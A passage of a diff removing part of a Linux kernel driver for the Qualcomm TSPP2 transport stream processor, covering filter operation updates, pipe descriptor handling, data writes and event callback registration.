--			break;
--	if (i == TSPP2_NUM_AVAIL_FILTERS) {
--		/* Should never happen */
--		pr_err("%s: No available filters\n", __func__);
--		return -ENOMEM;
--	}
--	tmp_filter = &src->device->filters[i];
--
--	/*
--	 * Set new filter operations. We do this relatively early
--	 * in the function to avoid cleanup operations if this fails.
--	 * Since this also writes to HW, we have to set the correct HW index.
--	 */
--	tmp_filter->hw_index = src->reserved_filter_hw_index;
--	/*
--	 * Need to set the mask properly to indicate if the filter handles
--	 * a unique PID.
--	 */
--	tmp_filter->mask = filter->mask;
--	ret = tspp2_filter_ops_add(tmp_filter, ops, operations_num);
--	if (ret) {
--		tmp_filter->hw_index = 0;
--		tmp_filter->mask = 0;
--		return ret;
--	}
--
--	/*
--	 * Mark new filter (in fact, the new filter HW index) as used in the
--	 * appropriate batch. The batch has to be one of the batches already
--	 * associated with the source.
--	 */
--	list_for_each_entry(batch, &src->batches_list, link) {
--		for (i = 0; i < TSPP2_FILTERS_PER_BATCH; i++) {
--			hw_idx = (batch->batch_id *
--					TSPP2_FILTERS_PER_BATCH) + i;
--			if (hw_idx == tmp_filter->hw_index) {
--				batch->hw_filters[i] = 1;
--				found = 1;
--				break;
--			}
--		}
--		if (found)
--			break;
--	}
--
--	if (!found) {
--		pr_err("%s: Could not find matching batch\n", __func__);
--		tspp2_filter_ops_clear(tmp_filter);
--		tmp_filter->hw_index = 0;
--		return -EINVAL;
--	}
--
--	/* Set the same context of the old filter to the new HW filter */
--	writel_relaxed((filter->context << FILTER_ENTRY1_CONTEXT_OFFS),
--		filter->device->base +
--		TSPP2_FILTER_ENTRY1(tmp_filter->hw_index));
--
--	/*
--	 * Reset partial context, if necessary. We want to reset a partial
--	 * context before we start using it, so if there's a new operation
--	 * that uses a context where before there was no operation that used it,
--	 * we reset that context. We need to do this before we start using the
--	 * new operation, so before we enable the new filter.
--	 * Note: there is no need to reset most of the filter's context-based
--	 * counters, because the filter keeps using the same context. The
--	 * exception is the PES error counters that we may want to reset when
--	 * resetting the entire PES context.
--	 */
--	if (!filter->pes_tx_op_set && tmp_filter->pes_tx_op_set) {
--		/* PES Tx operation added */
--		writel_relaxed(
--			(0x1 << TSPP2_MODULUS_OP(filter->context, 32)),
--			filter->device->base +
--			TSPP2_PES_CONTEXT_RESET(filter->context >> 5));
--		writel_relaxed(0, filter->device->base +
--			TSPP2_FILTER_PES_ERRORS(filter->context));
--	}
--
--	if (!filter->indexing_op_set && tmp_filter->indexing_op_set) {
--		/* Indexing operation added */
--		writel_relaxed(
--			(0x1 << TSPP2_MODULUS_OP(filter->context, 32)),
--			filter->device->base +
--			TSPP2_INDEXING_CONTEXT_RESET(filter->context >> 5));
--	}
--
--	/*
--	 * Write PID and mask to new filter HW registers and enable it.
--	 * Preserve filter indexing table ID.
--	 */
--	reg |= (0x1 << FILTER_ENTRY0_EN_OFFS);
--	reg |= ((filter->pid_value << FILTER_ENTRY0_PID_OFFS) |
--		(filter->mask << FILTER_ENTRY0_MASK_OFFS));
--	reg |= (tmp_filter->indexing_table_id << FILTER_ENTRY0_CODEC_OFFS);
--	writel_relaxed(reg, filter->device->base +
--		TSPP2_FILTER_ENTRY0(tmp_filter->hw_index));
--
--	/* Disable old HW filter */
--	writel_relaxed(0, filter->device->base +
--		TSPP2_FILTER_ENTRY0(filter->hw_index));
--
--	/*
--	 * HW requires we wait for up to 2ms here before removing the
--	 * operations used by this filter.
--	 */
--	udelay(TSPP2_HW_DELAY_USEC);
--
--	tspp2_filter_ops_clear(filter);
--
--	writel_relaxed(0, filter->device->base +
--		TSPP2_FILTER_ENTRY1(filter->hw_index));
--
--	/* Mark HW filter as unused in old batch */
--	filter->batch->hw_filters[(filter->hw_index -
--		(filter->batch->batch_id * TSPP2_FILTERS_PER_BATCH))] = 0;
--
--	/* The new HW filter may be in a new batch, so we need to update */
--	filter->batch = batch;
--
--	/*
--	 * Update source's reserved filter HW index, and also update the
--	 * new HW index in the filter object.
--	 */
--	src->reserved_filter_hw_index = filter->hw_index;
--	filter->hw_index = tmp_filter->hw_index;
--
--	/*
--	 * We've already set the new operations to HW, but we want to
--	 * update the filter object, too. tmp_filter contains all the
--	 * operations' related information we need (operations and flags).
--	 * Also, we make sure to update indexing_table_id based on the new
--	 * indexing operations.
--	 */
--	memcpy(filter->operations, tmp_filter->operations,
--		(sizeof(struct tspp2_operation) * TSPP2_MAX_OPS_PER_FILTER));
--	filter->num_user_operations = tmp_filter->num_user_operations;
--	filter->indexing_op_set = tmp_filter->indexing_op_set;
--	filter->raw_op_with_indexing = tmp_filter->raw_op_with_indexing;
--	filter->pes_analysis_op_set = tmp_filter->pes_analysis_op_set;
--	filter->raw_op_set = tmp_filter->raw_op_set;
--	filter->pes_tx_op_set = tmp_filter->pes_tx_op_set;
--	filter->indexing_table_id = tmp_filter->indexing_table_id;
--
--	/*
--	 * Now we can clean tmp_filter. This is really just to keep the filter
--	 * object clean. However, we don't want to use tspp2_filter_ops_clear()
--	 * because it clears the operations from HW too.
--	 */
--	memset(tmp_filter->operations, 0,
--		(sizeof(struct tspp2_operation) * TSPP2_MAX_OPS_PER_FILTER));
--	tmp_filter->num_user_operations = 0;
--	tmp_filter->indexing_op_set = 0;
--	tmp_filter->raw_op_with_indexing = 0;
--	tmp_filter->pes_analysis_op_set = 0;
--	tmp_filter->raw_op_set = 0;
--	tmp_filter->pes_tx_op_set = 0;
--	tmp_filter->indexing_table_id = 0;
--	tmp_filter->hw_index = 0;
--
--	dev_dbg(filter->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--
--/**
-- * tspp2_filter_operations_set() - Set operations to a filter.
-- *
-- * @filter_handle:	Filter to set operations to.
-- * @ops:		An array of up to TSPP2_MAX_OPS_PER_FILTER
-- *			operations.
-- * @operations_num:	Number of operations in the ops array.
-- *
-- * This function sets the required operations to a given filter. The filter
-- * can either be disabled (in which case it may or may not already have some
-- * operations set), or enabled (in which case it certainly has some oprations
-- * set). In any case, the filter's previous operations are cleared, and the new
-- * operations provided are set.
-- *
-- * In addition to some trivial parameter validity checks, the following
-- * restrictions are enforced:
-- * 1. A filter with a PES Analysis operation must handle a unique PID (i.e.,
-- *    should have a mask that equals TSPP2_UNIQUE_PID_MASK).
-- * 2. Only a single Raw Transmit operation per filter can support HW indexing
-- *    (i.e., can have its support_indexing configuration parameter set).
-- * 3. A PES Analysys operation must precede any PES Transmit operation.
-- * 4. A PES Transmit operation with SW indexing (i.e., with its
-- *    enable_sw_indexing parameter set) must be preceded by a Raw Transmit
-- *    operation.
-- * 5. Only a single indexing operation is supported per filter.
-- * 6. A Raw Transmit operation with indexing support must be configured before
-- *    the Indexing operation.
-- * 7. A PES Analysis operation must precede the Indexing operation.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_filter_operations_set(u32 filter_handle,
--			const struct tspp2_operation *ops,
--			u8 operations_num)
--{
--	struct tspp2_filter *filter = (struct tspp2_filter *)filter_handle;
--	int ret = 0;
--
--	if (!filter) {
--		pr_err("%s: Invalid filter handle\n", __func__);
--		return -EINVAL;
--	}
--	if (!ops || operations_num > TSPP2_MAX_OPS_PER_FILTER ||
--			operations_num == 0) {
--		pr_err("%s: Invalid ops parameter\n", __func__);
--		return -EINVAL;
--	}
--
--	ret = pm_runtime_get_sync(filter->device->dev);
--	if (ret < 0)
--		return ret;
--
--	if (mutex_lock_interruptible(&filter->device->mutex)) {
--		pm_runtime_mark_last_busy(filter->device->dev);
--		pm_runtime_put_autosuspend(filter->device->dev);
--		return -ERESTARTSYS;
--	}
--
--	if (!filter->device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&filter->device->mutex);
--		pm_runtime_mark_last_busy(filter->device->dev);
--		pm_runtime_put_autosuspend(filter->device->dev);
--		return -EPERM;
--	}
--
--	if (!filter->opened) {
--		pr_err("%s: Filter not opened\n", __func__);
--		mutex_unlock(&filter->device->mutex);
--		pm_runtime_mark_last_busy(filter->device->dev);
--		pm_runtime_put_autosuspend(filter->device->dev);
--		return -EINVAL;
--	}
--
--	if (filter->enabled)
--		ret = tspp2_filter_ops_update(filter, ops, operations_num);
--	else
--		ret = tspp2_filter_ops_add(filter, ops, operations_num);
--
--	mutex_unlock(&filter->device->mutex);
--
--	pm_runtime_mark_last_busy(filter->device->dev);
--	pm_runtime_put_autosuspend(filter->device->dev);
--
--	return ret;
--}
--EXPORT_SYMBOL(tspp2_filter_operations_set);
--
--/**
-- * tspp2_filter_operations_clear() - Clear all operations from a filter.
-- *
-- * @filter_handle:	Filter to clear all operations from.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_filter_operations_clear(u32 filter_handle)
--{
--	int ret;
--	struct tspp2_filter *filter = (struct tspp2_filter *)filter_handle;
--
--	if (!filter) {
--		pr_err("%s: Invalid filter handle\n", __func__);
--		return -EINVAL;
--	}
--
--	ret = pm_runtime_get_sync(filter->device->dev);
--	if (ret < 0)
--		return ret;
--
--	mutex_lock(&filter->device->mutex);
--
--	if (!filter->device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&filter->device->mutex);
--		pm_runtime_mark_last_busy(filter->device->dev);
--		pm_runtime_put_autosuspend(filter->device->dev);
--		return -EPERM;
--	}
--
--	if (!filter->opened) {
--		pr_err("%s: Filter not opened\n", __func__);
--		mutex_unlock(&filter->device->mutex);
--		pm_runtime_mark_last_busy(filter->device->dev);
--		pm_runtime_put_autosuspend(filter->device->dev);
--		return -EINVAL;
--	}
--
--	if (filter->num_user_operations == 0) {
--		pr_warn("%s: No operations to clear from filter\n", __func__);
--		mutex_unlock(&filter->device->mutex);
--		pm_runtime_mark_last_busy(filter->device->dev);
--		pm_runtime_put_autosuspend(filter->device->dev);
--		return 0;
--	}
--
--	tspp2_filter_ops_clear(filter);
--
--	mutex_unlock(&filter->device->mutex);
--
--	pm_runtime_mark_last_busy(filter->device->dev);
--	pm_runtime_put_autosuspend(filter->device->dev);
--
--	dev_dbg(filter->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--EXPORT_SYMBOL(tspp2_filter_operations_clear);
--
--/**
-- * tspp2_filter_current_scrambling_bits_get() - Get the current scrambling bits.
-- *
-- * @filter_handle:		Filter to get the scrambling bits from.
-- * @scrambling_bits_value:	The current value of the scrambling bits.
-- *				This could be the value from the TS packet
-- *				header, the value from the PES header, or a
-- *				logical OR operation of both values, depending
-- *				on the scrambling_bits_monitoring configuration
-- *				of the source this filter belongs to.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_filter_current_scrambling_bits_get(u32 filter_handle,
--			u8 *scrambling_bits_value)
--{
--	struct tspp2_filter *filter = (struct tspp2_filter *)filter_handle;
--	u32 reg;
--	u32 ts_bits;
--	u32 pes_bits;
--	int ret;
--
--	if (!filter) {
--		pr_err("%s: Invalid filter handle\n", __func__);
--		return -EINVAL;
--	}
--	if (scrambling_bits_value == NULL) {
--		pr_err("%s: Invalid parameter\n", __func__);
--		return -EINVAL;
--	}
--
--	ret = pm_runtime_get_sync(filter->device->dev);
--	if (ret < 0)
--		return ret;
--
--	if (mutex_lock_interruptible(&filter->device->mutex)) {
--		pm_runtime_mark_last_busy(filter->device->dev);
--		pm_runtime_put_autosuspend(filter->device->dev);
--		return -ERESTARTSYS;
--	}
--
--	if (!filter->device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&filter->device->mutex);
--		pm_runtime_mark_last_busy(filter->device->dev);
--		pm_runtime_put_autosuspend(filter->device->dev);
--		return -EPERM;
--	}
--
--	if (!filter->opened) {
--		pr_err("%s: Filter not opened\n", __func__);
--		mutex_unlock(&filter->device->mutex);
--		pm_runtime_mark_last_busy(filter->device->dev);
--		pm_runtime_put_autosuspend(filter->device->dev);
--		return -EINVAL;
--	}
--
--	reg = readl_relaxed(filter->device->base +
--			TSPP2_TSP_CONTEXT(filter->context));
--
--	ts_bits = ((reg >> TSP_CONTEXT_TS_HEADER_SC_OFFS) & 0x3);
--	pes_bits = ((reg >> TSP_CONTEXT_PES_HEADER_SC_OFFS) & 0x3);
--
--	switch (filter->src->scrambling_bits_monitoring) {
--	case TSPP2_SRC_SCRAMBLING_MONITOR_PES_ONLY:
--		*scrambling_bits_value = pes_bits;
--		break;
--	case TSPP2_SRC_SCRAMBLING_MONITOR_TS_ONLY:
--		*scrambling_bits_value = ts_bits;
--		break;
--	case TSPP2_SRC_SCRAMBLING_MONITOR_PES_AND_TS:
--		*scrambling_bits_value = (pes_bits | ts_bits);
--		break;
--	case TSPP2_SRC_SCRAMBLING_MONITOR_NONE:
--		/* fall through to default case */
--	default:
--		pr_err("%s: Invalid scrambling bits mode\n", __func__);
--		mutex_unlock(&filter->device->mutex);
--		pm_runtime_mark_last_busy(filter->device->dev);
--		pm_runtime_put_autosuspend(filter->device->dev);
--		return -EINVAL;
--	}
--
--	mutex_unlock(&filter->device->mutex);
--
--	pm_runtime_mark_last_busy(filter->device->dev);
--	pm_runtime_put_autosuspend(filter->device->dev);
--
--	dev_dbg(filter->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--EXPORT_SYMBOL(tspp2_filter_current_scrambling_bits_get);
--
--/* Data-path API functions */
--
--/**
-- * tspp2_pipe_descriptor_get() - Get a data descriptor from a pipe.
-- *
-- * @pipe_handle:	Pipe to get the descriptor from.
-- * @desc:		Received pipe data descriptor.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_pipe_descriptor_get(u32 pipe_handle, struct sps_iovec *desc)
--{
--	int ret;
--	struct tspp2_pipe *pipe = (struct tspp2_pipe *)pipe_handle;
--
--	if (!pipe) {
--		pr_err("%s: Invalid pipe handle\n", __func__);
--		return -EINVAL;
--	}
--	if (!desc) {
--		pr_err("%s: Invalid descriptor pointer\n", __func__);
--		return -EINVAL;
--	}
--
--	/* Descriptor pointer validity is checked inside the SPS driver. */
--
--	ret = pm_runtime_get_sync(pipe->device->dev);
--	if (ret < 0)
--		return ret;
--
--	if (mutex_lock_interruptible(&pipe->device->mutex)) {
--		pm_runtime_mark_last_busy(pipe->device->dev);
--		pm_runtime_put_autosuspend(pipe->device->dev);
--		return -ERESTARTSYS;
--	}
--
--	if (!pipe->device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&pipe->device->mutex);
--		pm_runtime_mark_last_busy(pipe->device->dev);
--		pm_runtime_put_autosuspend(pipe->device->dev);
--		return -EPERM;
--	}
--
--	if (!pipe->opened) {
--		pr_err("%s: Pipe not opened\n", __func__);
--		mutex_unlock(&pipe->device->mutex);
--		pm_runtime_mark_last_busy(pipe->device->dev);
--		pm_runtime_put_autosuspend(pipe->device->dev);
--		return -EINVAL;
--	}
--
--	ret = sps_get_iovec(pipe->sps_pipe, desc);
--
--	mutex_unlock(&pipe->device->mutex);
--
--	pm_runtime_mark_last_busy(pipe->device->dev);
--	pm_runtime_put_autosuspend(pipe->device->dev);
--
--	dev_dbg(pipe->device->dev, "%s: successful\n", __func__);
--
--	return ret;
--
--}
--EXPORT_SYMBOL(tspp2_pipe_descriptor_get);
--
--/**
-- * tspp2_pipe_descriptor_put() - Release a descriptor for reuse by the pipe.
-- *
-- * @pipe_handle:	Pipe to release the descriptor to.
-- * @addr:		Address to release for reuse.
-- * @size:		Size to release.
-- * @flags:		Descriptor flags.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_pipe_descriptor_put(u32 pipe_handle, u32 addr, u32 size, u32 flags)
--{
--	int ret;
--	struct tspp2_pipe *pipe = (struct tspp2_pipe *)pipe_handle;
--
--	if (!pipe) {
--		pr_err("%s: Invalid pipe handle\n", __func__);
--		return -EINVAL;
--	}
--
--	ret = pm_runtime_get_sync(pipe->device->dev);
--	if (ret < 0)
--		return ret;
--
--	if (mutex_lock_interruptible(&pipe->device->mutex)) {
--		pm_runtime_mark_last_busy(pipe->device->dev);
--		pm_runtime_put_autosuspend(pipe->device->dev);
--		return -ERESTARTSYS;
--	}
--
--	if (!pipe->device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&pipe->device->mutex);
--		pm_runtime_mark_last_busy(pipe->device->dev);
--		pm_runtime_put_autosuspend(pipe->device->dev);
--		return -EPERM;
--	}
--
--	if (!pipe->opened) {
--		pr_err("%s: Pipe not opened\n", __func__);
--		mutex_unlock(&pipe->device->mutex);
--		pm_runtime_mark_last_busy(pipe->device->dev);
--		pm_runtime_put_autosuspend(pipe->device->dev);
--		return -EINVAL;
--	}
--
--	ret = sps_transfer_one(pipe->sps_pipe, addr, size, NULL, flags);
--
--	mutex_unlock(&pipe->device->mutex);
--
--	pm_runtime_mark_last_busy(pipe->device->dev);
--	pm_runtime_put_autosuspend(pipe->device->dev);
--
--	dev_dbg(pipe->device->dev, "%s: successful\n", __func__);
--
--	return ret;
--}
--EXPORT_SYMBOL(tspp2_pipe_descriptor_put);
--
--/**
-- * tspp2_pipe_last_address_used_get() - Get the last address the TSPP2 used.
-- *
-- * @pipe_handle:	Pipe to get the address from.
-- * @address:		The last (virtual) address TSPP2 wrote data to.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_pipe_last_address_used_get(u32 pipe_handle, u32 *address)
--{
--	int ret;
--	struct tspp2_pipe *pipe = (struct tspp2_pipe *)pipe_handle;
--
--	if (!pipe) {
--		pr_err("%s: Invalid pipe handle\n", __func__);
--		return -EINVAL;
--	}
--	if (!address) {
--		pr_err("%s: Invalid address pointer\n", __func__);
--		return -EINVAL;
--	}
--
--	ret = pm_runtime_get_sync(pipe->device->dev);
--	if (ret < 0)
--		return ret;
--
--	if (mutex_lock_interruptible(&pipe->device->mutex)) {
--		pm_runtime_mark_last_busy(pipe->device->dev);
--		pm_runtime_put_autosuspend(pipe->device->dev);
--		return -ERESTARTSYS;
--	}
--
--	if (!pipe->device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&pipe->device->mutex);
--		pm_runtime_mark_last_busy(pipe->device->dev);
--		pm_runtime_put_autosuspend(pipe->device->dev);
--		return -EPERM;
--	}
--
--	if (!pipe->opened) {
--		pr_err("%s: Pipe not opened\n", __func__);
--		mutex_unlock(&pipe->device->mutex);
--		pm_runtime_mark_last_busy(pipe->device->dev);
--		pm_runtime_put_autosuspend(pipe->device->dev);
--		return -EINVAL;
--	}
--
--	*address = readl_relaxed(pipe->device->base +
--		TSPP2_PIPE_LAST_ADDRESS(pipe->hw_index));
--
--	mutex_unlock(&pipe->device->mutex);
--
--	pm_runtime_mark_last_busy(pipe->device->dev);
--	pm_runtime_put_autosuspend(pipe->device->dev);
--
--	*address = be32_to_cpu(*address);
--
--	dev_dbg(pipe->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--EXPORT_SYMBOL(tspp2_pipe_last_address_used_get);
--
--/**
-- * tspp2_data_write() - Write (feed) data to a source.
-- *
-- * @src_handle:	Source to feed data to.
-- * @offset:	Offset in the source's input pipe buffer.
-- * @size:	Size of data to write, in bytes.
-- *
-- * Schedule BAM transfers to feed data from the source's input pipe
-- * to TSPP2 for processing. Note that the user is responsible for opening
-- * an input pipe with the appropriate configuration parameters, and attaching
-- * this pipe as an input pipe to the source. Pipe configuration validity is not
-- * verified by this function.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_data_write(u32 src_handle, u32 offset, u32 size)
--{
--	int ret;
--	u32 desc_length;
--	u32 desc_flags;
--	u32 data_length = size;
--	u32 data_offset = offset;
--	struct tspp2_pipe *pipe;
--	struct tspp2_src *src = (struct tspp2_src *)src_handle;
--
--	if (!src) {
--		pr_err("%s: Invalid source handle\n", __func__);
--		return -EINVAL;
--	}
--
--	ret = pm_runtime_get_sync(src->device->dev);
--	if (ret < 0)
--		return ret;
--
--	if (mutex_lock_interruptible(&src->device->mutex)) {
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -ERESTARTSYS;
--	}
--
--	if (!src->device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&src->device->mutex);
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -EPERM;
--	}
--
--	if (!src->opened) {
--		pr_err("%s: Source not opened\n", __func__);
--		goto err_inval;
--	}
--
--	if (!src->enabled) {
--		pr_err("%s: Source not enabled\n", __func__);
--		goto err_inval;
--	}
--
--	if ((src->input != TSPP2_INPUT_MEMORY) || !src->input_pipe) {
--		pr_err("%s: Invalid source input or no input pipe\n", __func__);
--		goto err_inval;
--	}
--
--	pipe = src->input_pipe;
--
--	if (offset + size > pipe->cfg.buffer_size) {
--		pr_err("%s: offset + size > buffer size\n", __func__);
--		goto err_inval;
--	}
--
--	while (data_length) {
--		if (data_length > pipe->cfg.sps_cfg.descriptor_size) {
--			desc_length = pipe->cfg.sps_cfg.descriptor_size;
--			desc_flags = 0;
--		} else {
--			/* last descriptor */
--			desc_length = data_length;
--			desc_flags = SPS_IOVEC_FLAG_EOT;
--		}
--
--		ret = sps_transfer_one(pipe->sps_pipe,
--				pipe->iova + data_offset,
--				desc_length,
--				pipe->cfg.sps_cfg.user_info,
--				desc_flags);
--
--		if (ret) {
--			pr_err("%s: sps_transfer_one failed, %d\n",
--				__func__, ret);
--			mutex_unlock(&src->device->mutex);
--			pm_runtime_mark_last_busy(src->device->dev);
--			pm_runtime_put_autosuspend(src->device->dev);
--			return ret;
--		}
--
--		data_offset += desc_length;
--		data_length -= desc_length;
--	}
--
--	mutex_unlock(&src->device->mutex);
--
--	pm_runtime_mark_last_busy(src->device->dev);
--	pm_runtime_put_autosuspend(src->device->dev);
--
--	dev_dbg(src->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--
--err_inval:
--	mutex_unlock(&src->device->mutex);
--	pm_runtime_mark_last_busy(src->device->dev);
--	pm_runtime_put_autosuspend(src->device->dev);
--
--	return -EINVAL;
--}
--EXPORT_SYMBOL(tspp2_data_write);
--
--/**
-- * tspp2_tsif_data_write() - Write (feed) data to a TSIF source via Loopback.
-- *
-- * @src_handle:	Source to feed data to.
-- * @data:	data buffer containing one TS packet of size 188 Bytes.
-- *
-- * Write one TS packet of size 188 bytes to the TSIF loopback interface.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_tsif_data_write(u32 src_handle, u32 *data)
--{
--	int i;
--	int ret;
--	struct tspp2_src *src = (struct tspp2_src *)src_handle;
--	struct tspp2_tsif_device *tsif_device;
--	const unsigned int loopback_flags[3] = {0x01000000, 0, 0x02000000};
--
--	if (data == NULL) {
--		pr_err("%s: NULL data\n", __func__);
--		return -EINVAL;
--	}
--
--	if (!src) {
--		pr_err("%s: Invalid source handle\n", __func__);
--		return -EINVAL;
--	}
--
--	ret = pm_runtime_get_sync(src->device->dev);
--	if (ret < 0)
--		return ret;
--
--	if (mutex_lock_interruptible(&src->device->mutex)) {
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -ERESTARTSYS;
--	}
--
--	if (!src->device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&src->device->mutex);
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -EPERM;
--	}
--
--	if (!src->opened) {
--		pr_err("%s: Source not opened\n", __func__);
--		goto err_inval;
--	}
--
--	if (!src->enabled) {
--		pr_err("%s: Source not enabled\n", __func__);
--		goto err_inval;
--	}
--
--	if ((src->input != TSPP2_INPUT_TSIF0)
--		&& (src->input != TSPP2_INPUT_TSIF1)) {
--		pr_err("%s: Invalid source input\n", __func__);
--		goto err_inval;
--	}
--
--	tsif_device = &src->device->tsif_devices[src->input];
--
--	/* lpbk_flags : start && !last */
--	writel_relaxed(loopback_flags[0],
--		tsif_device->base + TSPP2_TSIF_LPBK_FLAGS);
--
--	/* 1-st dword of data */
--	writel_relaxed(data[0],
--		tsif_device->base + TSPP2_TSIF_LPBK_DATA);
--
--	/* Clear start bit */
--	writel_relaxed(loopback_flags[1],
--		tsif_device->base + TSPP2_TSIF_LPBK_FLAGS);
--
--	/* 45 more dwords */
--	for (i = 1; i < 46; i++)
--		writel_relaxed(data[i],
--			tsif_device->base + TSPP2_TSIF_LPBK_DATA);
--
--	/* Set last bit */
--	writel_relaxed(loopback_flags[2],
--		tsif_device->base + TSPP2_TSIF_LPBK_FLAGS);
--
--	/* Last data dword */
--	writel_relaxed(data[46], tsif_device->base + TSPP2_TSIF_LPBK_DATA);
--
--	mutex_unlock(&src->device->mutex);
--
--	pm_runtime_mark_last_busy(src->device->dev);
--	pm_runtime_put_autosuspend(src->device->dev);
--
--	dev_dbg(src->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--
--err_inval:
--	mutex_unlock(&src->device->mutex);
--	pm_runtime_mark_last_busy(src->device->dev);
--	pm_runtime_put_autosuspend(src->device->dev);
--
--	return -EINVAL;
--}
--EXPORT_SYMBOL(tspp2_tsif_data_write);
--
--/* Event notification API functions */
--
--/**
-- * tspp2_global_event_notification_register() - Get notified on a global event.
-- *
-- * @dev_id:			TSPP2 device ID.
-- * @global_event_bitmask:	A bitmask of global events,
-- *				TSPP2_GLOBAL_EVENT_XXX.
-- * @callback:			User callback function.
-- * @cookie:			User information passed to the callback.
-- *
-- * Register a user callback which will be invoked when certain global
-- * events occur. Note the values (mask, callback and cookie) are overwritten
-- * when calling this function multiple times. Therefore it is possible to
-- * "unregister" a callback by calling this function with the bitmask set to 0
-- * and with NULL callback and cookie.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_global_event_notification_register(u32 dev_id,
--			u32 global_event_bitmask,
--			void (*callback)(void *cookie, u32 event_bitmask),
--			void *cookie)
--{
--	struct tspp2_device *device;
--	unsigned long flags;
--	u32 reg = 0;
--
--	if (dev_id >= TSPP2_NUM_DEVICES) {
--		pr_err("%s: Invalid device ID %d\n", __func__, dev_id);
--		return -ENODEV;
--	}
--
--	device = tspp2_devices[dev_id];
--	if (!device) {
--		pr_err("%s: Invalid device\n", __func__);
--		return -ENODEV;
--	}
--
--	if (mutex_lock_interruptible(&device->mutex))
--		return -ERESTARTSYS;
--
--	if (!device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&device->mutex);
--		return -EPERM;
--	}
--
--	/*
--	 * Some of the interrupts that are generated when these events occur
--	 * may be disabled due to module parameters. So we make sure to enable
--	 * them here, depending on which event was requested. If some events
--	 * were requested before and now this function is called again with
--	 * other events, though, we want to restore the interrupt configuration
--	 * to the default state according to the module parameters.
--	 */
--	reg = readl_relaxed(device->base + TSPP2_GLOBAL_IRQ_ENABLE);
--	if (global_event_bitmask & TSPP2_GLOBAL_EVENT_INVALID_AF_CTRL) {
--		reg |= (0x1 << GLOBAL_IRQ_TSP_INVALID_AF_OFFS);
--	} else {
--		if (tspp2_en_invalid_af_ctrl)
--			reg |= (0x1 << GLOBAL_IRQ_TSP_INVALID_AF_OFFS);
--		else
--			reg &= ~(0x1 << GLOBAL_IRQ_TSP_INVALID_AF_OFFS);
--	}
--
--	if (global_event_bitmask & TSPP2_GLOBAL_EVENT_INVALID_AF_LENGTH) {
--		reg |= (0x1 << GLOBAL_IRQ_TSP_INVALID_LEN_OFFS);
--	} else {
--		if (tspp2_en_invalid_af_length)
--			reg |= (0x1 << GLOBAL_IRQ_TSP_INVALID_LEN_OFFS);
--		else
--			reg &= ~(0x1 << GLOBAL_IRQ_TSP_INVALID_LEN_OFFS);
--	}
--
--	if (global_event_bitmask & TSPP2_GLOBAL_EVENT_PES_NO_SYNC) {
--		reg |= (0x1 << GLOBAL_IRQ_PES_NO_SYNC_OFFS);
--	} else {
--		if (tspp2_en_pes_no_sync)
--			reg |= (0x1 << GLOBAL_IRQ_PES_NO_SYNC_OFFS);
--		else
--			reg &= ~(0x1 << GLOBAL_IRQ_PES_NO_SYNC_OFFS);
--	}
--
--	writel_relaxed(reg, device->base + TSPP2_GLOBAL_IRQ_ENABLE);
--
--	spin_lock_irqsave(&device->spinlock, flags);
--	device->event_callback = callback;
--	device->event_cookie = cookie;
--	device->event_bitmask = global_event_bitmask;
--	spin_unlock_irqrestore(&device->spinlock, flags);
--
--	mutex_unlock(&device->mutex);
--
--	dev_dbg(device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--EXPORT_SYMBOL(tspp2_global_event_notification_register);
--
--/**
-- * tspp2_src_event_notification_register() - Get notified on a source event.
-- *
-- * @src_handle:		Source handle.
-- * @src_event_bitmask:	A bitmask of source events,
-- *			TSPP2_SRC_EVENT_XXX.
-- * @callback:		User callback function.
-- * @cookie:		User information passed to the callback.
-- *
-- * Register a user callback which will be invoked when certain source
-- * events occur. Note the values (mask, callback and cookie) are overwritten
-- * when calling this function multiple times. Therefore it is possible to
-- * "unregister" a callback by calling this function with the bitmask set to 0
-- * and with NULL callback and cookie.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_src_event_notification_register(u32 src_handle,
--			u32 src_event_bitmask,
--			void (*callback)(void *cookie, u32 event_bitmask),
--			void *cookie)
--{
--	int ret;
--	u32 reg;
--	unsigned long flags;
--	struct tspp2_src *src = (struct tspp2_src *)src_handle;
--
--	if (!src) {
--		pr_err("%s: Invalid source handle\n", __func__);
--		return -EINVAL;
--	}
--
--	ret = pm_runtime_get_sync(src->device->dev);
--	if (ret < 0)
--		return ret;
--
--	if (mutex_lock_interruptible(&src->device->mutex)) {
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -ERESTARTSYS;
--	}
--
--	if (!src->device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
